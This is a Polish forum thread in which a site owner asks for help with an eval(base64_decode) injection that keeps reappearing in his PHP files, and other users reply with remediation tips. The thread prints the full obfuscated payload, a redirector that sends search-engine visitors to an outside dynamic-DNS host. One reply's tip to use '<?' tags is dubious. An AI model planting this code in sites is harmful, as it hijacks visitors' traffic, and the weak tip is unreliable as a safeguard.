Spam na stronach (eval(base64_decode...)

[Sanchez Spinoza]

Witam,

Od miesiąca borykam się ze spamem który dopieprza się do moich stron.

Otóż na wszystkich stronach które utrzymuję u mojego dostawcy serwera jest problem tego typu że do plików .php dopisuje się taki oto syf:

eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQo
KTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnP
SRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1
YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmV
mZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicm
FtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHk
iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ
1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZ
VwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tL2wiKSBv
ciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZl
cmVyLCJjYWNoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBhbmQgIXN0
cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly91
ZW5ka2drdy5kZG5zLm1lLnVrLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));

Dopisanie następuje po każdych znacznikach:

<?php ....

Usuwanie nic nie daje, bo gdy oczyszczę kod to za 2-3 dni dzieje się to samo.

Oczywiście pozmieniałem wszystkie hasła, do ftp do paneli admina itp.

Spam atakuje w taki sam spsób zarówno wordpressy, sklepy prestashop, oraz autorskie skrypty.

Jak się mam przed tym uchronić?

Jak z tym walczyć?

Spotkaliście się już z czymś takim?

[zgred]

zmienić haśło do FTP i od razu zmienić program do FTP - albo usunąc wszystkie hasła z kont FTP w programi eklienckim

sprawdzic czy w cron-ie nie działa jakiś skryp perl'owy

[Sanchez Spinoza]

Hasła pozmieniałem od razu. W programach FTP nigdy nie zapisuję haseł.

A tego CRONA to gdzie sprawdzić?

[Studenciak]

zmienic hosting moze?malo to razy były dziurawe serwery dostawcy

[Gość]

Możliwe jest również, że masz złośliwy skrypt na ftp. Sprawdź czy jest coś 'nie Twojego' na ftp.

Przeskanowałeś swój system antywirusem, combofixem itd.?

[Sanchez Spinoza]

Zmienić z kei.pl na co? Nie znam lepszej firmy.

[SzlafRock]

Zmienić z kei.pl na co? Nie znam lepszej firmy.

W takim razie masz dziurawe skrypty na serwerze.

[Mion]

Jak się mam przed tym uchronić?

Jak z tym walczyć?

Spotkaliście się już z czymś takim?

Zmienić hosting. Zaktualizować skrypty. Nie używać połączań FTP tylko SFTP.

[Studenciak]

masz podrzutka:)

pewnie kilka plikow-backdorow masz

[Sanchez Spinoza]

@mion SFTP masz na myśli przez port 22? Np. WinSCP?

[ar4]

wirus

[CashNet]

To wchodzi przez wordpressy. Miałem to samo, wyczyściłem konto do zera, każdy wordpress od początku czysty instalowany, zabezpieczyłem je wg tych wskazówek https://wpninja.pl/artykuly/jak-zabezpieczyc-wordpressa-przed-atakiem-brute-force-i-dlaczego-jeszcze-tego-nie-zrobiles/ i na razie spokój.

A we własnych skryptach nie zaczynać kodu od <?php tylko samo <? . Do takich plików się nie dopisywał.

[Mion]

@mion SFTP masz na myśli przez port 22? Np. WinSCP?

TAK, bo w FTP dane login i haslo idą "otwartym tekstem" a w SFTP są szyfrowane.

Tak samo nie należy logować się do paneli np DA bez SSH czyli HTTPS

[served]

SFTP masz na myśli przez port 22?

Nr portu zależy od ustawień serwera.

[mcmagik]

moja recepta: nie używać spiraconych skórek wordpress'a